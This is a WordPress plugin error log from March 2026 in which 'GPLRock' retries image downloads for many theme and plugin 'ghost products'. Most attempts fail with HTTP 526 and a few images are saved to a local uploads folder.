Retrying... [15-Mar-2026 13:18:22 UTC] GPLRock: Image download failed for product flatpack-multipurpose-unbounce-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flatpack---multipurpose-unbounce-pack-21575.webp for product flatpack-multipurpose-unbounce-pack after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:18:24 UTC] GPLRock WARNING: Image download failed for product flatpack-multipurpose-unbounce-pack. URL: https://meldwp.com/wp-content/uploads/flatpack---multipurpose-unbounce-pack-21575.webp [15-Mar-2026 13:18:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flatpack-multipurpose-unbounce-pack [15-Mar-2026 13:18:24 UTC] GPLRock: Image download failed for product nostalgia-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:27 UTC] GPLRock: Image download failed for product nostalgia-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nostalgia---portfolio-wordpress-theme-24013.webp for product nostalgia-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:18:29 UTC] GPLRock: Image download failed for product nostalgia-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:31 UTC] GPLRock: Image download failed for product nostalgia-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [15-Mar-2026 13:18:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nostalgia---portfolio-wordpress-theme-24013.webp for product nostalgia-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [15-Mar-2026 13:18:33 UTC] GPLRock WARNING: Image download failed for product nostalgia-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nostalgia---portfolio-wordpress-theme-24013.webp [15-Mar-2026 13:18:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nostalgia-portfolio-wordpress-theme [16-Mar-2026 01:12:56 UTC] GPLRock: Image download failed for product king-size-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:12:58 UTC] GPLRock: Image download failed for product king-size-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/king-size--creative-portfolio-wordpress-theme-9278.webp for product king-size-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:00 UTC] GPLRock: Image download failed for product king-size-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:02 UTC] GPLRock: Image download failed for product king-size-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/king-size--creative-portfolio-wordpress-theme-9278.webp for product king-size-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:04 UTC] GPLRock WARNING: Image download failed for product king-size-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/king-size--creative-portfolio-wordpress-theme-9278.webp [16-Mar-2026 01:13:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: king-size-creative-portfolio-wordpress-theme [16-Mar-2026 01:13:04 UTC] GPLRock: Image downloaded successfully for product etude-creative-agency-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f587e5ec.webp [16-Mar-2026 01:13:04 UTC] GPLRock: Using pre-downloaded image for product etude-creative-agency-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f587e5ec.webp [16-Mar-2026 01:13:04 UTC] GPLRock: Ghost product published with image - Product ID: etude-creative-agency-portfolio-wordpress-theme [16-Mar-2026 01:13:05 UTC] GPLRock: Image download failed for product levre-beauty-cosmetics-shop-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:07 UTC] GPLRock: Image download failed for product levre-beauty-cosmetics-shop-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/levre--beauty-cosmetics-shop-wordpress-5880.webp for product levre-beauty-cosmetics-shop-wordpress after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:09 UTC] GPLRock: Image download failed for product levre-beauty-cosmetics-shop-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:11 UTC] GPLRock: Image download failed for product levre-beauty-cosmetics-shop-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/levre--beauty-cosmetics-shop-wordpress-5880.webp for product levre-beauty-cosmetics-shop-wordpress after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:13 UTC] GPLRock WARNING: Image download failed for product levre-beauty-cosmetics-shop-wordpress. URL: https://meldwp.com/wp-content/uploads/levre--beauty-cosmetics-shop-wordpress-5880.webp [16-Mar-2026 01:13:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: levre-beauty-cosmetics-shop-wordpress [16-Mar-2026 01:13:13 UTC] GPLRock: Image download failed for product elementy-multipurpose-one-multi-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:15 UTC] GPLRock: Image download failed for product elementy-multipurpose-one-multi-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementy---multipurpose-one--multi-page-wordpress-theme-30173.webp for product elementy-multipurpose-one-multi-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:17 UTC] GPLRock: Image download failed for product elementy-multipurpose-one-multi-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:19 UTC] GPLRock: Image download failed for product elementy-multipurpose-one-multi-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementy---multipurpose-one--multi-page-wordpress-theme-30173.webp for product elementy-multipurpose-one-multi-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:22 UTC] GPLRock WARNING: Image download failed for product elementy-multipurpose-one-multi-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/elementy---multipurpose-one--multi-page-wordpress-theme-30173.webp [16-Mar-2026 01:13:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementy-multipurpose-one-multi-page-wordpress-theme [16-Mar-2026 01:13:22 UTC] GPLRock: Image download failed for product netzen-multivendor-nft-marketplace-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:24 UTC] GPLRock: Image download failed for product netzen-multivendor-nft-marketplace-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/netzen---multivendor-nft-marketplace-wordpress-theme-31349.webp for product netzen-multivendor-nft-marketplace-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:27 UTC] GPLRock: Image download failed for product netzen-multivendor-nft-marketplace-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:29 UTC] GPLRock: Image download failed for product netzen-multivendor-nft-marketplace-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/netzen---multivendor-nft-marketplace-wordpress-theme-31349.webp for product netzen-multivendor-nft-marketplace-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:31 UTC] GPLRock WARNING: Image download failed for product netzen-multivendor-nft-marketplace-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/netzen---multivendor-nft-marketplace-wordpress-theme-31349.webp [16-Mar-2026 01:13:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: netzen-multivendor-nft-marketplace-wordpress-theme [16-Mar-2026 01:13:31 UTC] GPLRock: Image download failed for product ale-ecommerce-wordpress-multipurpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:33 UTC] GPLRock: Image download failed for product ale-ecommerce-wordpress-multipurpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ale---ecommerce-wordpress-multipurpose-theme-15306.webp for product ale-ecommerce-wordpress-multipurpose-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:35 UTC] GPLRock: Image download failed for product ale-ecommerce-wordpress-multipurpose-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:37 UTC] GPLRock: Image download failed for product ale-ecommerce-wordpress-multipurpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ale---ecommerce-wordpress-multipurpose-theme-15306.webp for product ale-ecommerce-wordpress-multipurpose-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:40 UTC] GPLRock WARNING: Image download failed for product ale-ecommerce-wordpress-multipurpose-theme. URL: https://meldwp.com/wp-content/uploads/ale---ecommerce-wordpress-multipurpose-theme-15306.webp [16-Mar-2026 01:13:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ale-ecommerce-wordpress-multipurpose-theme [16-Mar-2026 01:13:40 UTC] GPLRock: Image downloaded successfully for product mj-simple-responsive-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ae2cef1.webp [16-Mar-2026 01:13:40 UTC] GPLRock: Using pre-downloaded image for product mj-simple-responsive-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ae2cef1.webp [16-Mar-2026 01:13:40 UTC] GPLRock: Ghost product published with image - Product ID: mj-simple-responsive-woocommerce-theme [16-Mar-2026 01:13:40 UTC] GPLRock: Image download failed for product foto-photography-wordpress-themes-for-photographers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:42 UTC] GPLRock: Image download failed for product foto-photography-wordpress-themes-for-photographers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foto---photography-wordpress-themes-for-photographers-15808.webp for product foto-photography-wordpress-themes-for-photographers after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:45 UTC] GPLRock: Image download failed for product foto-photography-wordpress-themes-for-photographers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:47 UTC] GPLRock: Image download failed for product foto-photography-wordpress-themes-for-photographers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foto---photography-wordpress-themes-for-photographers-15808.webp for product foto-photography-wordpress-themes-for-photographers after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 01:13:49 UTC] GPLRock WARNING: Image download failed for product foto-photography-wordpress-themes-for-photographers. URL: https://meldwp.com/wp-content/uploads/foto---photography-wordpress-themes-for-photographers-15808.webp [16-Mar-2026 01:13:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foto-photography-wordpress-themes-for-photographers [16-Mar-2026 01:13:49 UTC] GPLRock: Image download failed for product flati-responsive-flat-design-bootstrap-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 01:13:51 UTC] GPLRock: Image download failed for product flati-responsive-flat-design-bootstrap-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:15 UTC] GPLRock: Image download failed for product fastland-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:17 UTC] GPLRock: Image download failed for product fastland-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:17 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-products-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-145ce66f.jpg [16-Mar-2026 17:26:18 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-products-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-145ce66f.jpg [16-Mar-2026 17:26:18 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-products-addon [16-Mar-2026 17:26:19 UTC] GPLRock: Image downloaded successfully for product woocommerce-wholesale-pricing-register (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0c0ef82.jpg [16-Mar-2026 17:26:19 UTC] GPLRock: Using pre-downloaded image for product woocommerce-wholesale-pricing-register: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e0c0ef82.jpg [16-Mar-2026 17:26:19 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-wholesale-pricing-register [16-Mar-2026 17:26:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fastland---startup--saas-wordpress-theme-18905.webp for product fastland-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:20 UTC] GPLRock: Image download failed for product fastland-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:21 UTC] GPLRock: Image downloaded successfully for product league-table (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6be6c635.jpg [16-Mar-2026 17:26:21 UTC] GPLRock: Using pre-downloaded image for product league-table: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6be6c635.jpg [16-Mar-2026 17:26:21 UTC] GPLRock: Ghost product published with image - Product ID: league-table [16-Mar-2026 17:26:22 UTC] GPLRock: Image download failed for product fastland-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:22 UTC] GPLRock: Image downloaded successfully for product facetwp-relevanssi-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54f33a46.jpg [16-Mar-2026 17:26:22 UTC] GPLRock: Using pre-downloaded image for product facetwp-relevanssi-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-54f33a46.jpg [16-Mar-2026 17:26:22 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-relevanssi-integration [16-Mar-2026 17:26:24 UTC] GPLRock: Image downloaded successfully for product pillar-multipurpose-multi-concept-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-668049d2.jpg [16-Mar-2026 17:26:24 UTC] GPLRock: Using pre-downloaded image for product pillar-multipurpose-multi-concept-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-668049d2.jpg [16-Mar-2026 17:26:24 UTC] GPLRock: Ghost product published with image - Product ID: pillar-multipurpose-multi-concept-responsive-wordpress-theme [16-Mar-2026 17:26:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fastland---startup--saas-wordpress-theme-18905.webp for product fastland-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:24 UTC] GPLRock WARNING: Image download failed for product fastland-startup-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fastland---startup--saas-wordpress-theme-18905.webp [16-Mar-2026 17:26:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fastland-startup-saas-wordpress-theme [16-Mar-2026 17:26:24 UTC] GPLRock: Image download failed for product blance-clean-minimal-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:25 UTC] GPLRock: Image downloaded successfully for product product-gallery-slider-for-woocommerce-twist (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ed863e8.jpg [16-Mar-2026 17:26:25 UTC] GPLRock: Using pre-downloaded image for product product-gallery-slider-for-woocommerce-twist: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ed863e8.jpg [16-Mar-2026 17:26:25 UTC] GPLRock: Ghost product published with image - Product ID: product-gallery-slider-for-woocommerce-twist [16-Mar-2026 17:26:26 UTC] GPLRock: Image download failed for product blance-clean-minimal-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:26 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-popup-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd7180e8.jpg [16-Mar-2026 17:26:27 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-popup-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd7180e8.jpg [16-Mar-2026 17:26:27 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-popup-pro [16-Mar-2026 17:26:28 UTC] GPLRock: Image downloaded successfully for product css-igniter-korina-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-759fbeeb.jpg [16-Mar-2026 17:26:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blance---clean-minimal-woocommerce-wordpress-theme-16402.webp for product blance-clean-minimal-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:28 UTC] GPLRock: Using pre-downloaded image for product css-igniter-korina-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-759fbeeb.jpg [16-Mar-2026 17:26:28 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-korina-wordpress-theme [16-Mar-2026 17:26:28 UTC] GPLRock: Image download failed for product blance-clean-minimal-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:29 UTC] GPLRock: Image downloaded successfully for product elmastudio-zuki-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-10f37498.jpg [16-Mar-2026 17:26:29 UTC] GPLRock: Using pre-downloaded image for product elmastudio-zuki-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-10f37498.jpg [16-Mar-2026 17:26:29 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-zuki-wordpress-theme [16-Mar-2026 17:26:30 UTC] GPLRock: Image download failed for product blance-clean-minimal-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:30 UTC] GPLRock: Image downloaded successfully for product gravityview-a-z-filters-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73534811.jpg [16-Mar-2026 17:26:30 UTC] GPLRock: Using pre-downloaded image for product gravityview-a-z-filters-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-73534811.jpg [16-Mar-2026 17:26:30 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-a-z-filters-extension [16-Mar-2026 17:26:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blance---clean-minimal-woocommerce-wordpress-theme-16402.webp for product blance-clean-minimal-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:32 UTC] GPLRock WARNING: Image download failed for product blance-clean-minimal-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blance---clean-minimal-woocommerce-wordpress-theme-16402.webp [16-Mar-2026 17:26:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blance-clean-minimal-woocommerce-wordpress-theme [16-Mar-2026 17:26:33 UTC] GPLRock: Image download failed for product monity-cctv-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:35 UTC] GPLRock: Image download failed for product monity-cctv-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monity---cctv--security-wordpress-theme-12213.webp for product monity-cctv-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:37 UTC] GPLRock: Image download failed for product monity-cctv-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:39 UTC] GPLRock: Image download failed for product monity-cctv-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monity---cctv--security-wordpress-theme-12213.webp for product monity-cctv-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:41 UTC] GPLRock WARNING: Image download failed for product monity-cctv-security-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/monity---cctv--security-wordpress-theme-12213.webp [16-Mar-2026 17:26:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: monity-cctv-security-wordpress-theme [16-Mar-2026 17:26:41 UTC] GPLRock: Image download failed for product roxeen-personal-lightweight-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:43 UTC] GPLRock: Image download failed for product roxeen-personal-lightweight-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roxeen--personal-lightweight-wordpress-theme-24409.webp for product roxeen-personal-lightweight-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:46 UTC] GPLRock: Image download failed for product roxeen-personal-lightweight-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:48 UTC] GPLRock: Image download failed for product roxeen-personal-lightweight-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roxeen--personal-lightweight-wordpress-theme-24409.webp for product roxeen-personal-lightweight-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:50 UTC] GPLRock WARNING: Image download failed for product roxeen-personal-lightweight-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/roxeen--personal-lightweight-wordpress-theme-24409.webp [16-Mar-2026 17:26:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: roxeen-personal-lightweight-wordpress-theme [16-Mar-2026 17:26:50 UTC] GPLRock: Image download failed for product nuovo-social-media-digital-marketing-agency-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:52 UTC] GPLRock: Image download failed for product nuovo-social-media-digital-marketing-agency-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nuovo---social-media-digital-marketing-agency-seo-wordpress-theme-1350.webp for product nuovo-social-media-digital-marketing-agency-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:26:55 UTC] GPLRock: Image download failed for product nuovo-social-media-digital-marketing-agency-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:26:58 UTC] GPLRock: Image download failed for product nuovo-social-media-digital-marketing-agency-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nuovo---social-media-digital-marketing-agency-seo-wordpress-theme-1350.webp for product nuovo-social-media-digital-marketing-agency-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:00 UTC] GPLRock WARNING: Image download failed for product nuovo-social-media-digital-marketing-agency-seo-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nuovo---social-media-digital-marketing-agency-seo-wordpress-theme-1350.webp [16-Mar-2026 17:27:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nuovo-social-media-digital-marketing-agency-seo-wordpress-theme [16-Mar-2026 17:27:00 UTC] GPLRock: Image download failed for product bolt-electronics-furniture-gym-fashion-store-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:02 UTC] GPLRock: Image download failed for product bolt-electronics-furniture-gym-fashion-store-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bolt---electronics-furniture-gym--fashion-store-multipurpose-woocommerce-wordpre-9150.webp for product bolt-electronics-furniture-gym-fashion-store-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:04 UTC] GPLRock: Image download failed for product bolt-electronics-furniture-gym-fashion-store-multipurpose-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:06 UTC] GPLRock: Image download failed for product bolt-electronics-furniture-gym-fashion-store-multipurpose-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bolt---electronics-furniture-gym--fashion-store-multipurpose-woocommerce-wordpre-9150.webp for product bolt-electronics-furniture-gym-fashion-store-multipurpose-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:08 UTC] GPLRock WARNING: Image download failed for product bolt-electronics-furniture-gym-fashion-store-multipurpose-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bolt---electronics-furniture-gym--fashion-store-multipurpose-woocommerce-wordpre-9150.webp [16-Mar-2026 17:27:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bolt-electronics-furniture-gym-fashion-store-multipurpose-woocommerce-wordpress-theme [16-Mar-2026 17:27:09 UTC] GPLRock: Image download failed for product westy-responsive-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:11 UTC] GPLRock: Image download failed for product westy-responsive-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/westy---responsive-multi-purpose-wordpress-theme-17684.webp for product westy-responsive-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:13 UTC] GPLRock: Image download failed for product westy-responsive-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:15 UTC] GPLRock: Image download failed for product westy-responsive-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/westy---responsive-multi-purpose-wordpress-theme-17684.webp for product westy-responsive-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:17 UTC] GPLRock WARNING: Image download failed for product westy-responsive-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/westy---responsive-multi-purpose-wordpress-theme-17684.webp [16-Mar-2026 17:27:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: westy-responsive-multi-purpose-wordpress-theme [16-Mar-2026 17:27:17 UTC] GPLRock: Image download failed for product new-learning-premium-moodle-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:19 UTC] GPLRock: Image download failed for product new-learning-premium-moodle-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/new-learning--premium-moodle-theme-3190.webp for product new-learning-premium-moodle-theme after 3 attempts. HTTP Code: 526, Error: [16-Mar-2026 17:27:22 UTC] GPLRock: Image download failed for product new-learning-premium-moodle-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [16-Mar-2026 17:27:24 UTC] GPLRock: Image download failed for product new-learning-premium-moodle-theme 